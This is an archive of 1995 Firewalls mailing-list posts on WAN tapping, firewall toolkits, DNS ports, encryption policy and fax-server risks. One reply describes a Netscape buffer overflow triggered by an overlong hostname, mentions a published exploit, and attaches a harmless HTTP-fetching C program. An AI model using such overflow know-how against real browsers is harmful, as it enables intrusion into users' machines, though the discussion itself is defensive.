>cost/effort of implementing such a product <= effort of renumbering
>2k hosts?

Time for a plug here!

My company markets a product known imaginatively as the Internet Translation Gateway (ITG). It has been developed by us and is currently in its second release. Right now it uses static address maps only but the next version, which is in development now, will provide dynamic maps and is scheduled for December release. If you want more info., contact andy.harris@integralis.co.uk (we are about to set up a US office but it's not on stream yet).

Finally, if you really want a translation gateway integrated with a firewall, I believe Checkpoint now include some capability in their Firewall 1 product.

PS I would not even think about re-numbering 2k hosts!

From firewalls-owner Tue Oct 3 04:30:09 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA08390 for firewalls-outgoing; Tue, 3 Oct 1995 04:27:10 -0700
Received: from cbisgate.cbis.com (cbisgate.cbis.com [155.90.248.205]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id EAA08366 for ; Tue, 3 Oct 1995 04:27:03 -0700
Received: from notes by cbisgate.cbis.com (5.x/SMI-SVR4) id AA05168; Tue, 3 Oct 1995 07:25:30 -0400
Received: by notes (IBM OS/2 SENDMAIL VERSION 1.3.2)/1.0) id AA2938; Tue, 03 Oct 95 07:26:07 -0700
Message-Id: <9510031426.AA2938@notes>
Received: from CBIS with "Lotus Notes Mail Gateway for SMTP" id 3BDF2655247521538525624A003CB5FA; Tue, 3 Oct 95 07:26:05
To: firewalls-digest
From: Warren Moore
Date: 3 Oct 95 7:21:08 EDT
Subject: Re: How secure is a WAN then?
X-Importance: High
Mime-Version: 1.0
Content-Type: Text/Plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Mon, 2 Oct 1995, Richard Reno wrote:

>>> My company (me.com) has offices in Europe and headquarters in the US. If we use
>>> dedicated leased lines from the US to Europe (say from AT&T or MCI), can
>>> someone in between get our data?
>>
>> Absolutely. A CO switch at one of the local phone companies in this part of
>> the country was broken into and dedicated circuits tapped and listened to.
>> Because of this recent incident, my present client's "private" T1 circuits,
>> therefore, are link-encrypted.
>>
>
> In fact there does not have to even be a breakin if there is collusion on
> the part of someone at the CO.

Correct. But the point is that there has to be either physical access (breakin) to the CO or collusion on the part of telco employees...(unless, of course, someone has been stupid enough to *not* guard the OEM port on a switch). And, while both have happened, it is a far less likely happenstance than you might think; at least, in the USofA. (Of course, paranoia keeps us in business.)

Then again, if you're dealing with some other nation's PTT, who knows? There are a lot of published reports claiming that certain overseas telcos *routinely* intercept voice/data/fax on the behalf of their governments, who then provide what they see fit to their business entities. (And I can damn-near guarantee that this is true.)

Encryption Anyone?

Warren S. Moore, CISSP
Information Security Specialist
Cincinnati Bell Information Systems Inc.
From firewalls-owner Tue Oct 3 04:52:59 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA08856 for firewalls-outgoing; Tue, 3 Oct 1995 04:48:51 -0700
Received: from uu8.psi.com (uu8.psi.com [38.146.10.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id EAA08849 for ; Tue, 3 Oct 1995 04:48:47 -0700
Received: from [192.104.81.8] by uu8.psi.com (5.65b/4.0.940727-PSI/PSINet) via SMTP; id AA26030 for Firewalls@GreatCircle.COM; Tue, 3 Oct 95 07:46:35 -0400
Received: from ccMail by PO2.VRINET.COM (SMTPLINK V2.10.05) id AA812731523; Tue, 03 Oct 95 07:44:52 EST
Date: Tue, 03 Oct 95 07:44:52 EST
From: "Daniel Dutch"
Message-Id: <9509038127.AA812731523@PO2.VRINET.COM>
To: avalon@coombs.anu.edu.au, Larry Helber
Cc: Firewalls@GreatCircle.COM
Subject: Re[2]: Firewall-1: Patent-pending ?
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I know this is getting off the topic of firewalls but there is legislation going before the house this week that will change this.

-Info will be disclosed 18 months after the application is filed, period.
-Patent will be good 20 years from date of application, not date of patent issue. (Previously, it was 17 years from date of issue.)

-Daniel Dutch
-------

>patent pending then you will not get any information out of the patent
>office. A patent number and the information contained in the submitted
>documents does not have to be disclosed until the patent is approved. Also a
>pending patent may be amended so that it will defer the issue date of the
>patent. As long as you keep updating the patent on a yearly basis your
>patent will never get issued.
>
>
>This might be stretching the charter a bit...
>
>In the advertising material for Checkpoint's Firewall-1 (version 1.2)
>which I picked up recently, there are two mentions of "patent pending".
>
>There is NO mention of any application numbers that I can find or any
>further information on this.
>
>Having sent e-mail to checkpoint last week and having received no reply
>(surprised - NOT) I'm wondering if this is just a game.
>
>Can anyone provide some more information about the pending patents, such
>as application numbers or the applications themselves ?
>
>Thanks,
>Darren
>
>

From firewalls-owner Tue Oct 3 06:23:35 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA10424 for firewalls-outgoing; Tue, 3 Oct 1995 06:00:43 -0700
Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA10307 for ; Tue, 3 Oct 1995 06:00:19 -0700
Received: from TIS.COM by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id FAA14308; Tue, 3 Oct 1995 05:39:26 -0700
Received: from relay.tis.com by neptune.TIS.COM id aa19592; 3 Oct 95 8:42 EDT
Received: from sol.tis.com(192.33.112.100) by relay.tis.com via smap (g3.0.1) id xma028016; Tue, 3 Oct 95 08:25:40 -0400
Received: from gildor (gildor.tis.com) by tis.com (4.1/SUN-5.64) id AA10278; Tue, 3 Oct 95 08:41:40 EDT
Message-Id: <9510031241.AA10278@tis.com>
X-Sender: avolio@sol.tis.com
X-Mailer: Windows Eudora Version 2.1.1
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Tue, 03 Oct 1995 08:42:43 -0400
To: Tham Huei Hwan , Marcus Antonio - Projeto ISODE
From: Frederick M Avolio
Subject: Re: Public Domain FireWall Software
Cc: FireWalls
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

The TIS Internet Firewall Toolkit is freely available, licensed code. It is available at ftp.tis.com. It is not public domain, however. Please read the license agreement.
Fred

At 08:20 AM 10/3/95 +0800, Tham Huei Hwan wrote:
>Hi,
>
>You can obtain fwtk(firewalls tool kit) from ftp.tis.com
>
>
>On Fri, 29 Sep 1995, Marcus Antonio - Projeto ISODE wrote:
>
>>
>> Hello FireWalls
>>
>> My name's Marcus Antonio, and I'm a Computer Science student at
>> Brasil, and I have to implement a network security system. I'd like to know
>> how can I get some public domain FireWall software. I work with AIX system.
>> Any information would be very important.
>>
>> Thank you very much...
>>
>>
>> _______________________________________________________________________________
>>
>> _/_/_/_/ _/_/_/_/
>> _/_/_/_/ _/_/_/_/
>> _/_/ _/_/ _/_/ _/_/ _/_/_/_/ _/_/_/_/ _/_/_/_/ _/ _/ _/_/_/
>> _/_/ _/_/_/ _/_/ _/ _/ _/ _/ _/ _/ _/ _/
>> _/_/ _/ _/_/ _/ _/ _/ _/ _/ _/ _/ _/
>> _/_/ _/_/ _/_/_/_/ _/ _/_/ _/ _/ _/ _/_/_/_/
>> _/_/ _/_/ _/ _/ _/ _/ _/ _/ _/ _/
>> _/_/ _/_/ _/ _/ _/ _/ _/_/_/_/ _/_/_/_/ _/_/_/_/
>>
>> Marcus Antonio Almeida Rodrigues
>>
>> UECE
>> Universidade Estadual do Ceara'
>>
>> LAR
>> Laboratorio Multiinstitucional de Redes e Sistemas Distribuidos
>>
>>
>> e-Mail:marcus@fortal.uece.br
>> URL: http://www.uece.br/~marcus/
>> _______________________________________________________________________________
>>
>
>
>
>

From firewalls-owner Tue Oct 3 06:30:02 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA10572 for firewalls-outgoing; Tue, 3 Oct 1995 06:12:55 -0700
Received: from uu5.psi.com (uu5.psi.com [38.145.226.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA10565 for ; Tue, 3 Oct 1995 06:12:52 -0700
Received: by uu5.psi.com (5.65b/4.0.071791-PSI/PSINet) via UUCP; id AA20048 for ; Tue, 3 Oct 95 09:00:40 -0400
Date: Tue, 3 Oct 95 08:46:36 EDT
From: hhs@teleoscom.com (Chip Sharp X-6424)
Received: by teleoscom.com (4.1/3.2.083191-Teleos Communications Inc.)
	id AA03079; Tue, 3 Oct 95 08:46:36 EDT
Message-Id: <9510031246.AA03079@teleoscom.com>
To: Firewalls@GreatCircle.COM
In-Reply-To: firewalls-digest-owner@GreatCircle.COM's message of Mon, 2 Oct 1995 13:06:22 -0700 <199510022006.NAA03945@miles.greatcircle.com>
Subject: Re: How secure is a WAN then?
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>From: Richard Reno
>In fact there does not have to even be a breakin if there is collusion
>on the part of someone at the CO.

Long ago ... In one of our current spate of "Telecom Reform" laws, the FBI put in a requirement that all CO's have a "wiretap" port that would allow them to wiretap all digital calls. Theoretically, they are supposed to have a court order before doing so ;-).

=======================================================================
Hascall H. ("Chip") Sharp          Teleos Communications, Inc.
Sr. Systems Engineer               2 Meridian Road
                                   Eatontown, NJ 07724 USA
voice: +1 908 544 6424             fax: +1 908 544 9890
email: hhs@teleoscom.com           web: http://www.teleoscom.com/
========================================================================

From firewalls-owner Tue Oct 3 07:23:18 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA12013 for firewalls-outgoing; Tue, 3 Oct 1995 07:03:12 -0700
Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA12005 for ; Tue, 3 Oct 1995 07:03:06 -0700
Message-Id: <199510031403.HAA12005@miles.greatcircle.com>
Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA197318869; Wed, 4 Oct 1995 00:01:09 +1000
From: Darren Reed
Subject: named on port > 1023 ?
To: Firewalls@GreatCircle.COM (Firewalls Mailing List)
Date: Wed, 4 Oct 1995 00:01:09 +1000 (EST)
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 1141
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Does anyone run named on a port > 1023 as a non-root user ?

From the 4.9.3 BETA26 man page:
...
     -p      Use nonstandard port numbers. The default is the standard
             port number as returned by getservbyname(3) for service
             ``domain''. The argument can specify two port numbers
             separated by a slash (``/'') in which case the first port
             is that used when contacting remote servers, and the second
             one is the service port bound by the local instance of
             named. This is used mostly for debugging purposes.
...

Of course, how does one fix it so things work normally ?

Need to relay TCP port 53 -> your DNS port, and then a fairly intelligent program (could be spawned by inetd but!) which received packets on port 53, kept some state info about the packet and the DNS request and then made a new request (recording the matching information with the incoming one) to the name server on the non standard port. The UDP bit is probably the most complicated.

Has anyone done this or tried ? Anticipated problems ?

darren

From firewalls-owner Tue Oct 3 07:24:20 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA12111 for firewalls-outgoing; Tue, 3 Oct 1995 07:08:01 -0700
Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA12104 for ; Tue, 3 Oct 1995 07:07:57 -0700
Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA28117; Tue, 3 Oct 95 09:44:36 -0400
Date: Tue, 3 Oct 95 09:44:36 -0400
Message-Id: <9510031344.AA28117@uvs1.orl.mmc.com>
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com
Subject: Re: Encryption strength
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Ian J-B's excellent post raises a number of issues concerning security in general. Having been exposed to a KW-26 back in 196 I have been around it for longer than many here have been alive & have become somewhat opinionated on the subject.
Now I do not think for a minute in "encrypt everything and you do not need a firewall" being a disbeliever in single layer solutions. It is a valuable defense, potentially stronger than anything we have today, but enforces confidentiality and integrity (trustability) only, it does nothing for the availability issue and is subject to all manner of attacks (man-in-the-middle being the most difficult to protect against).

Further, key management is a perennial problem. "How is that first secure link established ?" is a chicken and the egg kind of problem. Today out-of-channel is the most popular answer as demonstrated by Netscape but is either a logistical nightmare or potential weakness. (It might be cheaper to buy ViaSign than to break their certificates).

For all of that, I believe that good encryption will be the element that begins to make our jobs easier, both via creation of secure links between Firewalls/Enterprises and through double wrapping at the application level. We also must realize that strengthening electronic security will also increase attacks at the physical and human level and must prepare for that as well.

Finally, I believe that after a lot of handwaving and rhetoric, governments are going to realize that while laws regulating encryption can be passed (sovereign rights), they cannot effectively be enforced for the very reasons that we have just been discussing concerning blocking of E-Mail. In order to prosecute a violation, in most democracies it will first be necessary to prove that encryption was used. Though easy to do today, it is trivial to make difficult (see Steganography). Once one government accepts this fact, it will be easier for others. I expect this will happen in Europe (The Netherlands ?) first. And then we will see an avalanche of products. The technology is easy and well known.
A final note: governments have already admitted compliance with the needs/wishes of multinational corporations (most financial transactions are exempt from ITAR for example). Once the major corporations of the world decide they need strong crypto, it will happen (and already is).

Warmly,
Padgett

From firewalls-owner Tue Oct 3 08:25:51 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA13738 for firewalls-outgoing; Tue, 3 Oct 1995 08:16:56 -0700
Received: from lehman.Lehman.COM (Lehman.COM [192.147.66.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA13721 for ; Tue, 3 Oct 1995 08:16:46 -0700
From: carson@lehman.com
Received: (from smap@localhost) by lehman.Lehman.COM (8.6.12/8.6.12) id LAA25126; Tue, 3 Oct 1995 11:15:16 -0400
Received: from relay.mail.lehman.com(192.9.140.112) by lehman via smap (V1.3) id tmp025111; Tue Oct 3 11:14:15 1995
Received: from kublai.lehman.com by relay.lehman.com (4.1/LB-0.6) id AA24452; Tue, 3 Oct 95 11:14:08 EDT
Received: from dragon.lehman.com by kublai.lehman.com (4.1/Lehman Bros. V1.6) id AA07774; Tue, 3 Oct 95 11:14:04 EDT
Received: by dragon.lehman.com (5.0/Lehman Bros. V1.5) id AA04489; Tue, 3 Oct 1995 11:14:04 -0400
Date: Tue, 3 Oct 1995 11:14:04 -0400
Message-Id: <9510031514.AA04489@dragon.lehman.com>
To: peter@nmti.com (Peter da Silva)
Cc: rik@spirit.com, Firewalls@GreatCircle.COM
Subject: Re: CERT and Firewalls BOFs
In-Reply-To: <9509281542.AA04617@sonic.nmti.com.nmti.com>
References: <199509270045.RAA01228@apache.spirit.com> <9509281542.AA04617@sonic.nmti.com.nmti.com>
Reply-To: carson@lehman.com
Content-Length: 1680
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Carson asked the audience [about 110 persons] if he should rewrite the
> ftp-gw proxy, part of the Firewall Toolkit, to do passive ftp? Or
> should he work with Brimstone SOS [which also has a license similar to
> TIS for their proxies, but fewer services], because the code quality is
> better.
> Why can't he just use whichever proxies he wants. They won't wake up and go "Ick, Freestone, I'm outta here!"...

While I could use anything I want to, I'd like to contribute my code back to the community. There are a fairly large number of folks using my TIS patches, particularly the ftp PASV support. I had intended a straw poll to see how many folks' lives would be made less spiffy if I stopped my work on the fwtk and went to a different code base. I, as usual, managed to put my foot in my mouth and irritate (at least) Marcus - not my intent at all.

My current plans are to add the PORT <-> PASV code to the fwtk, and then stop work on it (barring any new surprises like the syslog nastiness). After that I'll be doing a proof-of-concept implementation of an application proxy in Java to see what problems (if any) I'll encounter. In theory, it should eliminate vast numbers of opportunities to screw up - particularly buffer overruns. If I'm a _really_ good boy, I'll even try and write a paper on the results (performance, implementation difficulty, security, etc.). Of course, I may get lazy/busy, so no promises that I'll finish and please don't bother to ask me how it's going - I'll let y'all know when I have anything even vaguely presentable.
-- Carson Gaspar -- carson@cs.columbia.edu carson@lehman.com From firewalls-owner Tue Oct 3 09:00:48 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA14543 for firewalls-outgoing; Tue, 3 Oct 1995 08:43:05 -0700 Received: from psyche.the-wire.com (psyche.the-wire.com [198.53.192.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA14534 for ; Tue, 3 Oct 1995 08:42:58 -0700 Received: from anton.the-wire.com (anton.the-wire.com [198.53.192.186]) by psyche.the-wire.com (8.6.10/8.6.9) with SMTP id LAA00704 for ; Tue, 3 Oct 1995 11:41:13 -0400 Date: Tue, 3 Oct 1995 11:41:13 -0400 Message-Id: <199510031541.LAA00704@psyche.the-wire.com> X-Sender: anton@the-wire.com X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.COM From: Anton J Aylward Subject: Re: Web Browser Test -- WHAT!!!! Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Date: 02 Oct 1995 17:03:55 -0700 >From: Jacob Hinther >To: Firewalls >Subject: Web Browser Test >Sender: firewalls-owner@GreatCircle.COM > >Test your web browser! > > http://www.c2.org/ > http://www.c2.org/hackmsoft/ > http://www.c2.org/hacknetscape/ > >Jake > Er, without some idea of what this does, I'd rather not. How do I know this isn't some kind of bobm which will hit a bug (!?!) in Netscape whch will do strange things with my files or configuration? We've thrashed the WordVirus, couldn't this bhe something of the same ilk. Jake - whoever you are - if you really want us to try this, explain what it does, why it does it, and why you are presenting it to us. Without some credentials this just stirs our - well MY - paranoia. Like the mail address and the URL being so different, and the URL being a '.org' rather than a well known site. 
/anton - from paranoia city -- Anton J Aylward The Strahn and Strachan Group Inc Information Security Consultants Voice: (416) 494-8661 Fax: (416) 494-8803 From firewalls-owner Tue Oct 3 11:22:38 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA18001 for firewalls-outgoing; Tue, 3 Oct 1995 11:01:07 -0700 Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA17987 for ; Tue, 3 Oct 1995 11:01:03 -0700 From: /G=BECKY/S=HEROLD@mhs-pfg1.attmail.com Received: from alau.al.mt.np.els-gms.att.net by relay3.UU.NET with SMTP id QQzjwp07058; Tue, 3 Oct 1995 13:59:21 -0400 Received: from mhs!pfg1 by /C=US/AD=ATTMAIL;Tue Oct 3 17:57:16 -0000 1995 Received: by /C=us/AD=attmail/PD=pfg1;Tue Oct 3 12:25:34 -0500 1995 Date: Tue, 03 Oct 1995 12:25:34 -0500 Transport-Options: /STANDARD/REPORT Original-Encoding-Types: ASCII Disclose-Recipients: yes Subject: fax server security P2-Originator: mhs!pfg1/G=BECKY/S=HEROLD To: firewalls@greatcircle.com, /G=BECKY/S=HEROLD@mhs-pfg1.attmail.com Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Message-ID: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This topic is marginally related to firewalls. Please excuse this not-so-appropriate posting, but I've posted this to several other security-related lists over the past couple of weeks and I've not had a single reply. With the vast amount of knowledge in the readership of this list, I'm hopeful someone reading this message can help me out. We're in the test/pilot stages of installing fax servers on our network. We're looking at the Cheyenne FAXserve product running on Netware 3.12 for a limited number of employees. Is anyone aware of any risks for unauthorized access by using the fax only boards within the system? Is it possible to hack through these specialized modems into our network? 
Would it be possible for someone to send an executable file of any kind through the board to any of our networked computer systems? Should we put a firewall in front of these fax servers?

Thanks in advance for your thoughts/information!

Becky Herold
Sr. Systems Analyst, Information Protection
The Principal Financial Group
515-248-8521
herold.becky@MHS-PFG1.attmail.com
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
The opinions presented in this message are my own and do not necessarily represent the opinions of The Principal Financial Group.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

From firewalls-owner Tue Oct 3 11:30:19 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA18286 for firewalls-outgoing; Tue, 3 Oct 1995 11:13:27 -0700 Received: from real.com (eagle.real.com [199.97.122.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA18262 for ; Tue, 3 Oct 1995 11:13:19 -0700
Date: Tue, 3 Oct 1995 18:13:42 GMT
From: bret@real.com (Bret McDanel)
Received: by real.com (8.6.12/3.2.012693-Realistic Technologies Inc); id SAA06082 for firewalls@greatcircle.com; Tue, 3 Oct 1995 18:13:42 GMT
Message-Id: <199510031813.SAA06082@real.com>
To: firewalls@greatcircle.com
Subject: Re: Web Browser Test -- WHAT!!!!
Content-Type: X-sun-attachment
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

----------
X-Sun-Data-Type: text
X-Sun-Data-Description: text
X-Sun-Data-Name: text
X-Sun-Charset: us-ascii
X-Sun-Content-Lines: 41

>
> Er, without some idea of what this does, I'd rather not.
> How do I know this isn't some kind of bomb which will hit a bug (!?!) in
> Netscape
> which will do strange things with my files or configuration?
>

Can you not telnet to port 80 of his machine, issue a few commands, and get the HTML right to your screen, where it's harmless?
I did and read it, and it's a memory leak (just a guess) in Netscape (lynx didn't crash on the long hostnames).. All it is is a hostname about 512 bytes long.. That causes an overflow of the buffer (so in theory you could play games with the stack and have their program execute commands, after all Netscape has a habit of telling what OS it comes from when it connects).. Also, following one of the links I found a bunch of discussion about that hole, and about the seed for the random number generator.. There is even a c file with an exploit somewhere on the links (the link goes to france, and that is all I remember)

> Jake - whoever you are - if you really want us to try this, explain what it
> does, why it does it,
> and why you are presenting it to us. Without some credentials this just
> stirs our - well MY - paranoia.

If you are paranoid, perhaps you should take a couple of precautions (like telnetting to the port and reading the HTML, then see if it will exploit anything other than a core dump).. Inaction may mean that you never learn what is going on (and don't get the patch which is available at that site too)..

For all those that want to telnet to an URL but don't know how (so that you can verify data like this in the future) I included a simple program that will do this..

----------
X-Sun-Data-Type: c-file
X-Sun-Data-Description: c-file
X-Sun-Data-Name: webthief.c
X-Sun-Charset: us-ascii
X-Sun-Content-Lines: 86

/* This program allows you to connect to a WWW site, and get a specific HTML
 * (note this program won't get the cgi, only its output)..
 * I don't know what value or use it may have for anyone, but hey, it's
 * a fairly simple program..
 * No warranty is implied, no guarantee of any kind is implied, etc..
 * All that other standard disclaimer stuff too
 * Just in case that isn't enough USE AT OWN RISK :)
 *
 * I made it so that the HTML goes out on stdout, and the messages go
 * on stderr, so simple redirecting will enable you to save an HTML to
 * a file..
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

/* Resolve host (dotted quad or name), connect to it on port, and return
 * the connected socket.  Exits on any failure. */
int bindsocket(int port, char *host)
{
    int s;
    in_addr_t address;
    struct sockaddr_in sin;
    struct hostent *hp;

    memset(&sin, 0, sizeof sin);    /* sin was left uninitialised originally */
    if ((address = inet_addr(host)) == INADDR_NONE) {
        if ((hp = gethostbyname(host)) == NULL) {
            fprintf(stderr, "%s: address unknown or unparsable\n", host);
            exit(1);
        }
        if (hp->h_addrtype != AF_INET || hp->h_length != (int)sizeof sin.sin_addr) {
            fprintf(stderr, "%s: not an IPv4 address\n", host);
            exit(1);
        }
        memcpy(&sin.sin_addr, hp->h_addr_list[0], sizeof sin.sin_addr);
    } else {
        memcpy(&sin.sin_addr, &address, sizeof address);
    }
    if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        perror("socket");
        exit(1);
    }
    sin.sin_family = AF_INET;
    sin.sin_port = htons(port);
    fprintf(stderr, "Connecting to %s on port %d...\n", host, port);
    if (connect(s, (struct sockaddr *)&sin, sizeof sin) < 0) {
        perror("connect");
        exit(1);
    }
    fprintf(stderr, "Connected!\n");
    return s;
}

int main(int argc, char **argv)
{
    int port = 80, s, len;
    ssize_t n;
    char line[2048];

    if (argc < 3 || argc > 4) {
        fprintf(stderr, "Usage: %s machine html [port]\n", argv[0]);
        exit(1);
    }
    if (argc == 4)
        port = atoi(argv[3]);
    s = bindsocket(port, argv[1]);

    /* snprintf, not sprintf: a long path on the command line must not
     * overrun the request buffer.  HTTP wants CRLF line ends. */
    len = snprintf(line, sizeof line,
                   "GET %s HTTP/1.0\r\n"
                   "User-Agent: Mozilla/1.1N (X11; I; webthief 1.0 unix)\r\n"
                   "Accept: */*\r\n"
                   "Accept: image/gif\r\n"
                   "Accept: image/x-xbitmap\r\n"
                   "Accept: image/jpeg\r\n"
                   "\r\n", argv[2]);
    if (len < 0 || (size_t)len >= sizeof line) {
        fprintf(stderr, "request too long\n");
        exit(1);
    }
    if (write(s, line, (size_t)len) != len) {
        perror("write");
        exit(1);
    }

    /* Copy the reply to stdout until the server closes the connection.
     * Writing the byte count that read() returned (instead of printf("%s")
     * on a buffer that may hold no terminating NUL) keeps binary-safe
     * replies intact and never reads past what was actually received. */
    while ((n = read(s, line, sizeof line)) > 0)
        fwrite(line, 1, (size_t)n, stdout);
    if (n < 0)
        perror("read");
    close(s);
    fprintf(stderr, "All done!\n");
    return 0;
}

From firewalls-owner Tue Oct 3 11:52:45 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA18592 for firewalls-outgoing; Tue, 3 Oct 1995 11:26:53 -0700 Received: from safety.worldcom.com (safety.worldcom.com [198.64.193.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA18585 for ; Tue, 3 Oct 1995 11:26:50 -0700 Received: (from smtp@localhost) by safety.worldcom.com (8.6.11/8.6.9) id NAA12827 for ; Tue, 3 Oct 1995 13:21:51 -0500 Received: from worldcom-45.worldcom.com(198.64.193.76) by safety.worldcom.com via smap (V1.3) id sma012773; Tue Oct 3 13:21:18 1995 Received: by
worldcom-45.worldcom.com (IBM OS/2 SENDMAIL VERSION 1.3.14/3.3) id AA3202; Tue, 03 Oct 95 13:22:13 -0400 Message-Id: <9510031722.AA3202@worldcom-45.worldcom.com> Received: from worldcom with "Lotus Notes Mail Gateway for SMTP" id C066A24E339FBE7C8625624A0064BF9C; Tue, 3 Oct 95 13:22:13 To: firewalls From: Joseph Urban Date: 3 Oct 95 14:12:00 Subject: -No Subject- Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk sunscribe firewalls-digest From firewalls-owner Tue Oct 3 12:01:54 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA18961 for firewalls-outgoing; Tue, 3 Oct 1995 11:47:46 -0700 Received: from gate.vegas.com (gate.vegas.com [199.182.236.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA18954 for ; Tue, 3 Oct 1995 11:47:43 -0700 From: oddboy@vegas.com Received: by gate.vegas.com (5.x/SMI-SVR4) id AA13775; Tue, 3 Oct 1995 11:42:44 -0700 Date: Tue, 3 Oct 1995 11:42:44 -0700 Message-Id: <9510031842.AA13775@gate.vegas.com> To: firewalls@greatcircle.com Subject: IRC X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I find myself in the position of having to put up a private IRC server (private being not connected to either Undernet or Efnet). Basically this is to allow "chat" forums for a few of my clients. I would like to make these chat lines live outside of my firewall (and plan on it) nut am curious what I should watch out for in terms of folks being able to hack through and into an OS. (i run solaris2.4 but I think the IRC server will run on a DEC box running OSF/DecUnix. Any and all info will be greatly appreciated. 
Gideon Wober Systems Administrator Digitainment Corporation From firewalls-owner Tue Oct 3 12:24:19 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA19895 for firewalls-outgoing; Tue, 3 Oct 1995 12:10:53 -0700 Received: from Heuristicrat.COM (Heuristicrat.COM [199.171.120.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA19888 for ; Tue, 3 Oct 1995 12:10:50 -0700 Received: (smap@localhost) by Heuristicrat.COM (8.6.11/8.6.5) id MAA06269; Tue, 3 Oct 1995 12:09:21 -0700 Received: from euclid.heuristicrat.com(199.171.121.3) by Heuristicrat.COM via smap (V1.3) id sma006267; Tue Oct 3 12:09:17 1995 Received: from shattuck.Heuristicrat.COM by euclid.Heuristicrat.COM (4.1/Othar) id AA16654; Tue, 3 Oct 95 12:09:16 PDT Date: Tue, 3 Oct 95 12:09:16 PDT From: jordan@Heuristicrat.COM (Jordan M. Hayes) Message-Id: <9510031909.AA16654@euclid.Heuristicrat.COM> To: firewalls@GreatCircle.COM Subject: FLEXlm with proxy ...? Cc: fwtk-users@TIS.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Anyone built a FLEXlm proxy for FWTK? 
